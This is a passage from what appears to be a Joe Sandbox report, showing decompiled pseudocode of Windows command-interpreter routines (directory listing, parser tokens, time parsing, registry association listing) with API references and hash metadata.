                                    					memset( &_v76, 0, 0x30);
                                    					_t225 = _t224 + 0xc;
                                    					_t129 = E011E297B( *((intOrPtr*)(_t168 + 4)));
                                    					_t172 = 0x10;
                                    					_v72 = _t129;
                                    					_t173 = E011E00B0(_t172);
                                    					if(_t173 == 0) {
                                    						L51:
                                    						E011F9287(_t173);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						L52:
                                    						_v56 = _t195;
                                    						_t218 = _t195;
                                    						L10:
                                    						if( *0x11fd544 != 0) {
                                    							goto L47;
                                    						}
                                    						_v12 = _t195;
                                    						if(_v56 <= 0) {
                                    							L38:
                                    							E011E0040(_v48);
                                    							E011E0040(_v52);
                                    							E011E0040(_v64[1]);
                                    							E011E0040(_v64);
                                    							E011E0040(_v72);
                                    							if(_t218 != 0 || _v16 != _t218) {
                                    								return _t218;
                                    							} else {
                                    								_push(2);
                                    								L41:
                                    								_pop(_t138);
                                    								return _t138;
                                    							}
                                    						} else {
                                    							goto L12;
                                    						}
                                    						do {
                                    							L12:
                                    							_t180 = ".";
                                    							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
                                    							_t37 = _t210 + 0x30; // 0x30
                                    							_t140 = _t37;
                                    							_v24 = _t140;
                                    							while(1) {
                                    								_t196 =  *_t140;
                                    								if(_t196 !=  *_t180) {
                                    									break;
                                    								}
                                    								if(_t196 == 0) {
                                    									L17:
                                    									_t141 = 0;
                                    									L18:
                                    									if(_t141 == 0) {
                                    										goto L37;
                                    									}
                                    									_t181 = L"..";
                                    									_t41 = _t210 + 0x30; // 0x30
                                    									_t144 = _t41;
                                    									while(1) {
                                    										_t197 =  *_t144;
                                    										if(_t197 !=  *_t181) {
                                    											break;
                                    										}
                                    										if(_t197 == 0) {
                                    											L24:
                                    											_t145 = 0;
                                    											L25:
                                    											if(_t145 == 0) {
                                    												goto L37;
                                    											}
                                    											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
                                    												L28:
                                    												_t198 =  *((intOrPtr*)(_t168 + 4));
                                    												_t51 = _t198 + 2; // 0x402
                                    												_t182 = _t51;
                                    												do {
                                    													_t146 =  *_t198;
                                    													_t198 = _t198 + 2;
                                    												} while (_t146 != 0);
                                    												_t211 = _v24;
                                    												_t183 = _t211;
                                    												_t195 = _t198 - _t182 >> 1;
                                    												_t220 = _t183 + 2;
                                    												do {
                                    													_t147 =  *_t183;
                                    													_t183 = _t183 + 2;
                                    												} while (_t147 != _v28);
                                    												_t55 = _t195 + 2; // 0x400
                                    												_t185 = _t183 - _t220 >> 1;
                                    												_t222 = _t55 + (_t183 - _t220 >> 1);
                                    												if(_t222 > 0x7fe7) {
                                    													_push(_t211);
                                    													E011DC5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
                                    													_push(0x6f);
                                    													goto L41;
                                    												}
                                    												memset( &_v124, 0, 0x30);
                                    												_t225 = _t225 + 0xc;
                                    												_t173 = _t222 + _t222;
                                    												_t152 = E011E00B0(_t222 + _t222);
                                    												if(_t152 == 0) {
                                    													goto L51;
                                    												}
                                    												_v120 = _t152;
                                    												E011E51C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
                                    												_v112 =  *((intOrPtr*)(_t168 + 0xc));
                                    												_v116 =  *((intOrPtr*)(_t168 + 8));
                                    												_v108 =  *((intOrPtr*)(_t168 + 0x10));
                                    												_t218 = E011E5266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20, _a24, _a28, _a32);
                                    												E011E0040(_v100);
                                    												_v100 = 0;
                                    												E011E0040(_v96);
                                    												_v96 = 0;
                                    												E011E0040(_v120);
                                    												_v120 = 0;
                                    												if(_t218 == 0) {
                                    													_v16 = 1;
                                    													goto L37;
                                    												}
                                    												if(_t218 != 2) {
                                    													if(_t218 != 0x6f && _t218 != 3) {
                                    														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
                                    														if(( *(_t162 + 4) & 0x00000400) == 0) {
                                    															goto L38;
                                    														}
                                    														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
                                    															goto L36;
                                    														}
                                    														if( *(_t162 + 0x28) != 0x8000000a) {
                                    															goto L38;
                                    														}
                                    													}
                                    												}
                                    												L36:
                                    												_t218 = 0;
                                    												goto L37;
                                    											} else {
                                    												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
                                    													goto L37;
                                    												} else {
                                    													goto L28;
                                    												}
                                    											}
                                    										}
                                    										_t203 =  *((intOrPtr*)(_t144 + 2));
                                    										_t43 =  &(_t181[2]); // 0x2e
                                    										if(_t203 !=  *_t43) {
                                    											break;
                                    										}
                                    										_t144 = _t144 + 4;
                                    										_t181 =  &(_t181[4]);
                                    										if(_t203 != 0) {
                                    											continue;
                                    										}
                                    										goto L24;
                                    									}
                                    									asm("sbb eax, eax");
                                    									_t145 = _t144 | 0x00000001;
                                    									goto L25;
                                    								}
                                    								_t204 =  *((intOrPtr*)(_t140 + 2));
                                    								_t40 =  &(_t180[2]); // 0x200000
                                    								if(_t204 !=  *_t40) {
                                    									break;
                                    								}
                                    								_t140 = _t140 + 4;
                                    								_t180 =  &(_t180[4]);
                                    								if(_t204 != 0) {
                                    									continue;
                                    								}
                                    								goto L17;
                                    							}
                                    							asm("sbb eax, eax");
                                    							_t141 = _t140 | 0x00000001;
                                    							goto L18;
                                    							L37:
                                    							_t143 = _v12 + 1;
                                    							_v12 = _t143;
                                    						} while (_t143 < _v56);
                                    						goto L38;
                                    					}
                                    					_t163 =  *((intOrPtr*)(_t168 + 0x10));
                                    					_v60 = _t163;
                                    					_v64 = _t173;
                                    					_t164 = L"*.*";
                                    					_v68 = 1;
                                    					_v76 = 0;
                                    					if(_t163 == 0) {
                                    						_t164 = "*";
                                    					}
                                    					 *_t173 = _t164;
                                    					_v64[1] = E011E297B(_v72);
                                    					_v64[3] = 0;
                                    					_t218 = E011E5590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
                                    					_t195 = 0;
                                    					if(_t218 != 0) {
                                    						goto L52;
                                    					} else {
                                    						goto L10;
                                    					}
                                    				}
                                    				if(_t123 != 2) {
                                    					if(_t123 == 3) {
                                    						goto L3;
                                    					}
                                    				} else {
                                    					L3:
                                    					_t216 = _v8 & 0x00000001;
                                    					if(_t216 != 0) {
                                    						goto L4;
                                    					}
                                    				}
                                    				return _t123;
                                    			}

                                    APIs
                                      • Part of subcall function 011E5590: memset.MSVCRT ref: 011E5614
                                      • Part of subcall function 011E0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,011E36B3,011E3691,00000000), ref: 011E0078
                                      • Part of subcall function 011E0040: RtlFreeHeap.NTDLL(00000000), ref: 011E007F
                                    • memset.MSVCRT ref: 011E5303
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011E547A
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?), ref: 011EF111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$memset$Process$AllocFreelongjmp
                                    • String ID: *.*
                                    • API String ID: 539101449-438819550
                                    • Opcode ID: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction ID: f272619b77c9fde7b7153aa4ca50a1b8708a0100f008a81fdcae6fb49fc07b02
                                    • Opcode Fuzzy Hash: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction Fuzzy Hash: 1AB1B075E00A069BDB6DDFE8C848AAEBBF3AF58318F154069E905EB241D731DD41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E011DF090(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t17;
                                    				intOrPtr _t19;
                                    				signed int _t26;
                                    				signed int _t27;
                                    				signed int _t28;
                                    				intOrPtr _t37;
                                    				signed int _t40;
                                    				signed int _t41;
                                    				void* _t43;
                                    				intOrPtr _t46;
                                    				intOrPtr* _t51;
                                    				intOrPtr _t59;
                                    				intOrPtr _t61;
                                    				signed int _t62;
                                    				intOrPtr _t68;
                                    				intOrPtr _t69;
                                    				intOrPtr* _t70;
                                    				intOrPtr _t71;
                                    				intOrPtr* _t72;
                                    				intOrPtr* _t73;
                                    				intOrPtr* _t74;
                                    				signed int _t75;
                                    				void* _t76;
                                    				intOrPtr _t83;
                                    
                                    				_t66 = __edx;
                                    				_t17 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t17 ^ _t75;
                                    				_t73 = _a8;
                                    				_v12 = __edx;
                                    				_t70 = __ecx;
                                    				if(_t73 == E011E0210) {
                                    					_t19 = E011E0210(__ecx, __edx);
                                    				} else {
                                    					if(_t73 == E011E0480) {
                                    						_t19 = E011E0480();
                                    					} else {
                                    						if(_t73 == E011E0600) {
                                    							_t19 = E011E0600();
                                    						} else {
                                    							if(_t73 != E011E0620) {
                                    								 *0x12194b4();
                                    								_t19 =  *_t73();
                                    							} else {
                                    								_t19 = E011E0620();
                                    							}
                                    						}
                                    					}
                                    				}
                                    				_t46 = _t19;
                                    				if( *((short*)( *0x120b8a4)) == 0) {
                                    					L21:
                                    					return E011E6FD0(_t46, _t46, _v8 ^ _t75, _t66, _t70, _t73);
                                    				} else {
                                    					_t83 =  *0x11fd554; // 0x0
                                    					if(_t83 != 0) {
                                    					}
                                    					_t68 = E011DF300(0x10, 0x120faa0, 0x2000, 0x10);
                                    					 *0x120fa90 = _t68;
                                    					if(_t68 == 0xffffffff) {
                                    						 *0x120f980 = 0x234a;
                                    						__imp__longjmp(0x120b940, 1);
                                    						goto L49;
                                    					} else {
                                    						_t62 = 0x120faa0;
                                    						_t4 = _t62 + 2; // 0x120faa2
                                    						_t73 = _t4;
                                    						do {
                                    							_t43 =  *_t62;
                                    							_t62 = _t62 + 2;
                                    						} while (_t43 != 0);
                                    						_t5 = (_t62 - _t73 >> 1) + 1; // 0x120fa9f
                                    						 *0x120fa8c = _t5;
                                    						if( *0x120f984 != 0) {
                                    							L49:
                                    							_push(0x120faa0);
                                    							_push(_t68);
                                    							E011E25D9(L"GeToken: (%x) \'%s\'\n");
                                    							_t76 = _t76 + 0xc;
                                    						}
                                    					}
                                    					_t26 = 0x120faa0;
                                    					_t51 = _t70;
                                    					while(1) {
                                    						_t69 =  *_t51;
                                    						if(_t69 !=  *_t26) {
                                    							break;
                                    						}
                                    						if(_t69 == 0) {
                                    							L17:
                                    							_t27 = 0;
                                    						} else {
                                    							_t6 = _t51 + 2; // 0x2b0000
                                    							_t66 =  *_t6;
                                    							if(_t66 !=  *((intOrPtr*)(_t26 + 2))) {
                                    								break;
                                    							} else {
                                    								_t51 = _t51 + 4;
                                    								_t26 = _t26 + 4;
                                    								if(_t66 != 0) {
                                    									continue;
                                    								} else {
                                    									goto L17;
                                    								}
                                    							}
                                    						}
                                    						L18:
                                    						if(_t27 == 0) {
                                    							if( *0x120faa0 == 0xa) {
                                    								goto L34;
                                    							} else {
                                    								_t71 = _v12;
                                    								goto L37;
                                    							}
                                    						} else {
                                    							_t40 =  *0x11fd558; // 0x0
                                    							if( *((char*)(_t40 + 0x120f987)) == 0x33) {
                                    								_t41 = "&";
                                    								while(1) {
                                    									_t59 =  *_t70;
                                    									if(_t59 !=  *_t41) {
                                    										break;
                                    									}
                                    									if(_t59 == 0) {
                                    										L30:
                                    										_t40 = 0;
                                    									} else {
                                    										_t10 = _t70 + 2; // 0x2b0000
                                    										_t61 =  *_t10;
                                    										_t11 = _t41 + 2; // 0x2b0000
                                    										if(_t61 !=  *_t11) {
                                    											break;
                                    										} else {
                                    											_t70 = _t70 + 4;
                                    											_t41 = _t41 + 4;
                                    											if(_t61 != 0) {
                                    												continue;
                                    											} else {
                                    												goto L30;
                                    											}
                                    										}
                                    									}
                                    									L31:
                                    									if(_t40 != 0 ||  *0x120faa0 != 0xa) {
                                    										goto L20;
                                    									} else {
                                    										do {
                                    											L34:
                                    											_t28 = E011DF030(0);
                                    										} while ( *0x120faa0 == 0xa);
                                    										_t66 = 0;
                                    										E011DF300(_t28, 0, 0, 0);
                                    										if( *0x120faa0 == 0x29) {
                                    											goto L21;
                                    										} else {
                                    											_t71 = 0x2e;
                                    											L37:
                                    											_t74 = E011E00B0(0x50);
                                    											if(_t74 == 0) {
                                    												E011F9287(0x50);
                                    												__imp__longjmp(0x120b8b8, 1);
                                    												asm("int3");
                                    												_push( *0x120b8a0);
                                    												E011E25D9(L"Ungetting: \'%s\'\n");
                                    												 *0x120b8a4 =  *0x120b8a0;
                                    												return 0;
                                    											} else {
                                    												 *_t74 = _t71;
                                    												 *((intOrPtr*)(_t74 + 0x38)) = _t46;
                                    												 *0x11fd548 = 1;
                                    												E011DF030(8);
                                    												_t72 = _a4;
                                    												 *0x11fd548 = 0;
                                    												if(_t72 != E011DE8C0) {
                                    													 *0x12194b4();
                                    													_t37 =  *_t72();
                                    												} else {
                                    													_t37 = E011DE8C0();
                                    												}
                                    												 *((intOrPtr*)(_t74 + 0x3c)) = _t37;
                                    												return E011E6FD0(_t74, _t46, _v8 ^ _t75, _t66, _t72, _t74);
                                    											}
                                    										}
                                    									}
                                    									goto L52;
                                    								}
                                    								asm("sbb eax, eax");
                                    								_t40 = _t41 | 0x00000001;
                                    								goto L31;
                                    							} else {
                                    								L20:
                                    								_t66 = 0;
                                    								E011DF300(_t40, 0, 0, 0);
                                    								goto L21;
                                    							}
                                    						}
                                    						goto L52;
                                    					}
                                    					asm("sbb eax, eax");
                                    					_t27 = _t26 | 0x00000001;
                                    					goto L18;
                                    				}
                                    				L52:
                                    			}

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                    • API String ID: 0-1704545398
                                    • Opcode ID: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction ID: 57408817a8dd5529476c4dff142a9f40bd4cfef1c67897232c3cf6abd08dabe3
                                    • Opcode Fuzzy Hash: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction Fuzzy Hash: 8B513C317401075BEB3DAFBCD91837A76E2FB95318F49812AD5038B285DB718687C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E011F4159(signed int __ecx, wchar_t* __edx, intOrPtr _a4) {
                                    				signed int _v8;
                                    				char _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				signed int _v32;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t26;
                                    				long _t29;
                                    				void* _t30;
                                    				void* _t32;
                                    				int _t36;
                                    				signed int _t39;
                                    				signed int _t40;
                                    				signed int _t41;
                                    				signed short _t42;
                                    				long _t45;
                                    				long _t46;
                                    				signed int _t48;
                                    				wchar_t* _t52;
                                    				int _t55;
                                    				signed int _t59;
                                    				void* _t64;
                                    				long* _t66;
                                    				intOrPtr _t69;
                                    				long* _t73;
                                    				void* _t77;
                                    				void* _t78;
                                    				void* _t79;
                                    				wchar_t* _t81;
                                    				signed int _t83;
                                    				signed int _t84;
                                    				void* _t85;
                                    
                                    				_t26 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t26 ^ _t84;
                                    				_v32 = __ecx;
                                    				_v28 = _a4;
                                    				_t52 = __edx;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsw");
                                    				_t55 = 0;
                                    				_v24 = __ecx + 8;
                                    				_t77 = 0;
                                    				while(1) {
                                    					_t81 = _t52;
                                    					_t8 =  &(_t81[0]); // 0x2
                                    					_t73 = _t8;
                                    					do {
                                    						_t29 =  *_t81;
                                    						_t81 =  &(_t81[0]);
                                    					} while (_t29 != _t55);
                                    					_t83 = _t81 - _t73 >> 1;
                                    					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
                                    						L16:
                                    						_t74 =  *_t52 & 0x0000ffff;
                                    						if(( *_t52 & 0x0000ffff) == 0) {
                                    							goto L31;
                                    						} else {
                                    							if(E011DD7D4( &_v20, _t74) == 0) {
                                    								goto L11;
                                    							} else {
                                    								goto L18;
                                    							}
                                    						}
                                    					} else {
                                    						_t45 = _t52[0] & 0x0000ffff;
                                    						if(_t45 == 0 || iswdigit(_t45) != 0) {
                                    							_t46 = wcstol(_t52, 0, 0xa);
                                    							_t66 = _v24;
                                    							_t52 = _t52 + _t83 * 2 + 2;
                                    							_t85 = _t85 + 0xc;
                                    							 *_t66 = _t46;
                                    							_t74 =  *_t52 & 0x0000ffff;
                                    							_v24 =  &(_t66[0]);
                                    							if(( *_t52 & 0x0000ffff) == 0) {
                                    								L31:
                                    								_t77 = _t77 + 1;
                                    								_t30 = 4;
                                    								if(_t77 < _t30) {
                                    									_t78 = _v24;
                                    									_t59 = _t30 - _t77 >> 1;
                                    									_t36 = memset(_t78, 0, _t59 << 2);
                                    									_t79 = _t78 + _t59;
                                    									asm("adc ecx, ecx");
                                    									memset(_t79, _t36, 0);
                                    									_t77 = _t79;
                                    								}
                                    								_t32 = 1;
                                    							} else {
                                    								if(E011DD7D4( &_v20, _t74) != 0) {
                                    									L18:
                                    									_t39 =  *_t52 & 0x0000ffff;
                                    									if(_t39 == 0x70 || _t39 == 0x50) {
                                    										_t64 = 1;
                                    									} else {
                                    										_t64 = 0;
                                    									}
                                    									_t40 = _t52[1] & 0x0000ffff;
                                    									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
                                    										_t74 = _v32;
                                    										_t41 =  *(_t74 + 8) & 0x0000ffff;
                                    										if(_t64 == 0) {
                                    											if(_t41 == 0xc) {
                                    												_t42 = 0;
                                    												goto L30;
                                    											}
                                    										} else {
                                    											if(_t41 != 0xc) {
                                    												_t42 = _t41 + 0xc;
                                    												L30:
                                    												 *(_t74 + 8) = _t42;
                                    											}
                                    										}
                                    										goto L31;
                                    									} else {
                                    										goto L11;
                                    									}
                                    								} else {
                                    									_t48 =  *_t52 & 0x0000ffff;
                                    									_t69 = _v28;
                                    									if(_t77 >= 2) {
                                    										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
                                    											goto L14;
                                    										} else {
                                    											goto L11;
                                    										}
                                    									} else {
                                    										_t74 = _t48;
                                    										if(E011DD7D4(_t69, _t48) != 0) {
                                    											L14:
                                    											_t77 = _t77 + 1;
                                    											_t52 = E011DD7E6(_t52);
                                    											if(_t77 >= 4) {
                                    												goto L16;
                                    											} else {
                                    												_t55 = 0;
                                    												continue;
                                    											}
                                    										} else {
                                    											L11:
                                    											_t32 = 0;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							goto L16;
                                    						}
                                    					}
                                    					return E011E6FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswdigit$wcstol
                                    • String ID: aApP
                                    • API String ID: 644763121-2547155087
                                    • Opcode ID: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction ID: 0aa3b0cca32f986d17f25b8c548019d41504aff5f6729d95060213638df22435
                                    • Opcode Fuzzy Hash: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction Fuzzy Hash: F0410379A0011286EF2CDBACE88527FB7B5BF55204715443EEF46DBA85EB30D982C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E011F4B4E(void* __ecx, signed int __edx) {
                                    				signed int _v8;
                                    				short _v528;
                                    				void* _v532;
                                    				int _v536;
                                    				int _v540;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t19;
                                    				void* _t24;
                                    				signed int _t26;
                                    				signed int _t31;
                                    				void* _t39;
                                    				void* _t42;
                                    				int _t43;
                                    				signed int _t53;
                                    				signed int _t54;
                                    				int _t59;
                                    				void* _t64;
                                    				int* _t66;
                                    				void* _t67;
                                    				void* _t69;
                                    				signed int _t70;
                                    				void* _t71;
                                    				void* _t80;
                                    
                                    				_t63 = __edx;
                                    				_t19 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t19 ^ _t70;
                                    				_t67 = __ecx;
                                    				_v532 = __ecx;
                                    				if(__edx != 0) {
                                    					_t43 = E011DDF40(E011DDEF9(__edx));
                                    					__eflags = _t43;
                                    					if(_t43 == 0) {
                                    						L14:
                                    						_t24 = 1;
                                    						L28:
                                    						__eflags = _v8 ^ _t70;
                                    						return E011E6FD0(_t24, _t43, _v8 ^ _t70, _t63, _t66, _t67);
                                    					}
                                    					_t64 = 0x20;
                                    					_t26 = E011E2349(_t43, _t64);
                                    					__eflags = _t26;
                                    					if(__eflags != 0) {
                                    						__eflags = 0;
                                    						 *_t26 = 0;
                                    					}
                                    					_t50 = _t67;
                                    					_t63 = E011F5662(_t43, _t67, _t43, _t66, _t67, __eflags);
                                    					_v532 = _t63;
                                    					__eflags = _t63;
                                    					if(_t63 == 0) {
                                    						L25:
                                    						_t67 = 1;
                                    						__eflags = 1;
                                    						E011DC5A2(_t50, 0x400023a3, 1, _t43);
                                    						goto L26;
                                    					} else {
                                    						_t53 = _t63;
                                    						_t66 = 0;
                                    						__eflags = 0;
                                    						_t16 = _t53 + 2; // 0x2
                                    						_t69 = _t16;
                                    						do {
                                    							_t31 =  *_t53;
                                    							_t53 = _t53 + 2;
                                    							__eflags = _t31;
                                    						} while (_t31 != 0);
                                    						_t54 = _t53 - _t69;
                                    						__eflags = _t54;
                                    						_t50 = _t54 >> 1;
                                    						if(_t54 == 0) {
                                    							goto L25;
                                    						}
                                    						_push(_t63);
                                    						_push(_t43);
                                    						_t67 = E011E25D9(L"%s=%s\r\n");
                                    						L26:
                                    						E011E0040(_v532);
                                    						E011E0040(_t43);
                                    						L27:
                                    						_t24 = _t67;
                                    						goto L28;
                                    					}
                                    				}
                                    				_t66 = 0;
                                    				_t43 = 0;
                                    				_v536 = 0;
                                    				while(1) {
                                    					_v540 = 0x104;
                                    					_t67 = RegEnumKeyExW(_t67, _t43,  &_v528,  &_v540, _t66, _t66, _t66, _t66);
                                    					if(_t67 != 0) {
                                    						break;
                                    					}
                                    					_t76 = _v528 - 0x2e;
                                    					if(_v528 != 0x2e) {
                                    						L10:
                                    						_t80 =  *0x11fd544 - _t66; // 0x0
                                    						if(_t80 != 0) {
                                    							goto L14;
                                    						}
                                    						_t43 = _t43 + 1;
                                    						_v536 = _t43;
                                    						if(_t67 != 0) {
                                    							goto L27;
                                    						}
                                    						_t67 = _v532;
                                    						continue;
                                    					}
                                    					_t56 = _v532;
                                    					_t63 =  &_v528;
                                    					_t43 = E011F5662(_t43, _v532,  &_v528, _t66, _t67, _t76);
                                    					if(_t43 == 0) {
                                    						_push(_t66);
                                    						_push(GetLastError());
                                    						E011DC5A2(_t56);
                                    						goto L14;
                                    					}
                                    					_t59 = _t43;
                                    					_t10 = _t59 + 2; // 0x2
                                    					_t63 = _t10;
                                    					do {
                                    						_t39 =  *_t59;
                                    						_t59 = _t59 + 2;
                                    					} while (_t39 != _t66);
                                    					if(_t59 != _t63) {
                                    						_push(_t43);
                                    						_push( &_v528);
                                    						_t42 = E011E25D9(L"%s=%s\r\n");
                                    						_t71 = _t71 + 0xc;
                                    						_t67 = _t42;
                                    					}
                                    					E011E0040(_t43);
                                    					_t43 = _v536;
                                    					goto L10;
                                    				}
                                    				__eflags = _t67 - 0x103;
                                    				if(_t67 == 0x103) {
                                    					_t67 = _t66;
                                    				}
                                    				goto L27;
                                    			}

                                    APIs
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4B9E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4C2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: EnumErrorLast
                                    • String ID: %s=%s$.
                                    • API String ID: 1967352920-4275322459
                                    • Opcode ID: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction ID: 666e5663c9a4e08802e6672649645547f98ad4a168bfce08b4b2956925f350b7
                                    • Opcode Fuzzy Hash: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction Fuzzy Hash: B6416871F0021A87CB3CABAD9CA8BBB76F9EB94314F0501ADDA1A97240DF704E418791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E011FAB79(void* __ecx, char* __edx, signed char* _a4) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				signed int _v28;
                                    				void _v548;
                                    				char* _v552;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t25;
                                    				void* _t39;
                                    				char _t42;
                                    				void* _t44;
                                    				intOrPtr _t47;
                                    				void* _t59;
                                    				signed int _t61;
                                    
                                    				_t58 = __edx;
                                    				_t25 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t25 ^ _t61;
                                    				_v28 = _v28 & 0x00000000;
                                    				_t60 = 0x104;
                                    				_v552 = __edx;
                                    				_v20 = 0x104;
                                    				_t46 = 1;
                                    				_t59 = __ecx;
                                    				_v24 = 1;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
                                    					_t37 = _a4;
                                    					_t60 = L"%s";
                                    					if(( *_a4 & 0x00000010) != 0) {
                                    						_t60 = L"[%s]";
                                    					}
                                    					_t39 = E011E0D89(_t58, _t37 + 0x2c);
                                    					_t54 = _v28;
                                    					if(_v28 == 0) {
                                    						_t54 =  &_v548;
                                    					}
                                    					_t47 = _v552;
                                    					E011E6810(_t39, _t54, _t47);
                                    					if(_t47 < 0) {
                                    						_t44 = _v28;
                                    						if(_t44 == 0) {
                                    							_t44 =  &_v548;
                                    						}
                                    						__imp___wcslwr(_t44);
                                    					}
                                    					_t41 = _v28;
                                    					if(_v28 == 0) {
                                    						_t41 =  &_v548;
                                    					}
                                    					_t58 = _t60;
                                    					_t42 = E011E6B76(_t59, _t60, _t41);
                                    					_t46 = _t42;
                                    					if(_t42 == 0) {
                                    						_t46 = E011F7D7D(_t59);
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t46, _t46, _v8 ^ _t61, _t58, _t59, _t60, _v28);
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011FABB5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcslwr.MSVCRT ref: 011FAC29
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAC59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
